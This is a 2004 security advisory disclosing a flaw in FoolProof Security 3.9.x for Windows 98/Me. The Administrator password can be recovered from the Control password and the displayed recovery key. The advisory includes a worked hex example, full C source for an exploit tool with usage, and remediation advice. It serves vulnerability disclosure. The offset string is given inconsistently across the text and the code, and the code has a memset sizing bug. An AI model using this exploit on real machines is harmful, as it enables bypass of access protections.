~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Cyrillium Security Advisory CYSA-0329 advisories@cyrillium.com
http://www.cyrillium.com/ Cyrillium Security Solutions and Services
April 29th, 2004
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


Severity: High (Password Compromise)

Vendor:
SmartStuff Software (member of Riverdeep Interactive Learning, Inc.)

Affected Products:
FoolProof Security 3.9.x for Windows 98/98SE/Me

Unaffected Products:
FoolProof Security for Macintosh
FoolProof Security for Windows XP and Windows 2000

1. Problem Description

    Cyrillium Security Solutions and Services has discovered a
vulnerability
    in the password recovery feature of FoolProof Security that allows an
    attacker to recover the "Administrator" password using the "Control"
    password and password recovery key.

    FoolProof for Macintosh and FoolProof for Windows XP & 2000 are not
    affected because they do not support the password recovery feature.

2. Details
    
    Passwords are stored as 16-byte, zero-padded ASCII strings. When
FoolProof
    Security is installed, an "Administrator" password must be specified.
    Either the "Administrator" password or the "Control" password may be
used
    to access the FoolProof control panel and to bypass the Bootlock and
    Keylock protection features. If the "Control" password is forgotten or
    compromised, the "Administrator" password can be used to either
enter the
    FoolProof control panel to change the "Control" password or to
determine
    the "Control" password from the password recovery key.

    The password recovery key is a 32-character hexadecimal string that
can be
    obtained by holding down the Shift key and pressing "OK" in the
FoolProof
    control panel's initial password dialog box. The ADMINPW.EXE program on
    the FoolProof Security installation diskette calculates the "Control"
    password from the "Administrator" password and the password recovery
key.

    The ADMINPW.EXE program combines the zero-padded "Administrator"
password
    with the password recovery key using the bitwise exclusive OR (XOR)
    operation. Next, the ASCII string "D:SKFOIK(*EHJFL" is subtracted from
    the previous result (one byte at a time). The final result is the
    "Control" password.

    If C represents the "Control" password, A represents the
"Administrator"
    password, B represents the ASCII string "D:SKFOIJ(*EHJFL", and K
    represents the password recovery key, then manipulating the formula:
        C = (A xor K) - B
    yields:
        A = (C + B) xor K
    Thus, the "Administrator" password can be calculated if the "Control"
    password and password recovery key are known.

    The password recovery key is trivial to obtain by holding down the
Shift
    key and pressing "OK" in the FoolProof control panel's initial password
    dialog box. If the "Control" password is compromised, the
"Administrator"
    password can be compromised as well.

    Example:
    
    Administrator password is "12345":
        A = 31 32 33 34 35 00 00 00 00 00 00 00 00 00 00 00 (hexadecimal)
    Control password is "HelloWorld":
        C = 48 65 6C 6C 6F 57 6F 72 6C 64 00 00 00 00 00 00
    Recovery key (reported by FoolProof control panel):
        K = BD AD 8C 83 80 A6 B8 BC AC 8C 2A 45 48 4A 46 4C
    Offsets (constant):
        B = 44 3A 53 4B 46 4F 49 4A 40 28 2A 45 48 4A 46 4C

    Recovery process (ADMINPW.EXE algorithm):
        A xor K = 8C 9F BF B7 B5 A6 B8 BC AC 8C 2A 45 48 4A 46 4C
        (A xor K) - B = 48 65 6C 6C 6F 57 6F 72 6C 64 00 00 00 00 00 00
        (A xor K) - B = "HelloWorld" = Control password

    Reverse recovery process:
        C + B = 8C 9F BF B7 B5 A6 B8 BC AC 8C 2A 45 48 4A 46 4C
        (C + B) xor K = 31 32 33 34 35 00 00 00 00 00 00 00 00 00 00 00
        (C + B) xor K = "12345" = Administrator password

    The "Administrator" password can be successfully determined knowing
only
    the "Control" password and the password recovery key.

4. Exploit
    
    The following program calculates the "Administrator" password from the
    password recovery key and the "Control" password.
    
    Usage:
        
        Invoke the program with the following arguments:

        foolpw HEXADECIMAL_RECOVERY_KEY CONTROL_PASSWORD

        Example:

        C:\> foolpw BDAD8C8380A6B8BCAC8C2A45484A464C HelloWorld
        12345
    
    Source code:

/*

foolpw.c
Copyright (C) 2004 Cyrillium Security Solutions and Services.

Demonstrates a weakness in FoolProof Security password recovery system. See
CYSA-0329 for details.

CYRILLIUM SECURITY SOLUTIONS AND SERVICES DOES NOT PROVIDE ANY WARRANTY FOR
THIS PROGRAM, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED
TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE.
THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH
YOU.
SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY
SERVICING, REPAIR OR CORRECTION.

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main (int argc, char *argv[])
{
    int i; /* Index variable */
    char a, /* Temporary variable for calculations */
         k[33], /* Recovery key in hexadecimal */
         k_array[17], /* Recovery key as array */
         c[17], /* Control password */
         *b = "D:SKFOIJ@(*EHJFL", /* Offsets */
         hex_temp[2], /* Temporary storage for hexadecimal conversion */
         *endptr; /* Output variable for strtoul */

    if (argc != 3)
    {
        puts ("Usage: foolpw RECOVERY_KEY CONTROL_PASSWORD");
        return 1;
    }
    if (strlen (argv[1]) != 16*2)
    {
        puts ("Recovery key must be 16 hexadecimal bytes (32 characters)");
        return 1;
    }
    if (strlen (argv[2]) > 16)
    {
        puts ("Passwords are limited to 16 characters");
        return 1;
    }
    memset (k, 0, sizeof (b));
    memset (k_array, 0, sizeof (b));
    memset (c, 0, sizeof (c));
    memset (hex_temp, 0, sizeof (hex_temp));
    strcpy (k, argv[1]);
    strcpy (c, argv[2]);

    for (i = 0; i < 16; i++)
    {
        memcpy (hex_temp, &k[i*2], 2);
        k_array[i] = strtoul (hex_temp, &endptr, 16);
        if (*endptr != '\0')
        {
            printf("\nInvalid hexadecimal character \'%c\'\n", *endptr);
            return 1;
        }
        a = (c[i] + b[i]) ^ k_array[i];
        putc (a, stdout);
    }
    puts ("");
    return 0;
}

5. Solution
    
    Users who know the "Administrator" password can enter the FoolProof
    control panel and bypass Bootlock/Keylock on any computer that has the
    same "Administrator" password as the compromised computer. To change
the
    "Administrator" password, FoolProof Security must be reinstalled.

    Upgrading to FoolProof Security 4.0 or higher is recommended because
the
    password recovery feature has been removed. However, FoolProof versions
    4.0 and higher do not support Windows 95, Windows 98, or Windows Me.

    Remember to read the uninstallation and upgrade instructions before
    upgrading FoolProof Security, especially if you are using
    Bootlock/Keylock. Improper uninstallation or upgrading could cause your
    computer to fail to boot.

6. References
    
    1. SmartStuff Software: <http://www.smartstuff.com/>
    2. Riverdeep Interactive Learning, Inc.: <http://www.riverdeep.net>

7. Copyright
    
    Copyright (C) 2004 Cyrillium Security Solutions and Services. All
rights
    reserved. Permission is granted to redistribute unmodified copies of
    this advisory.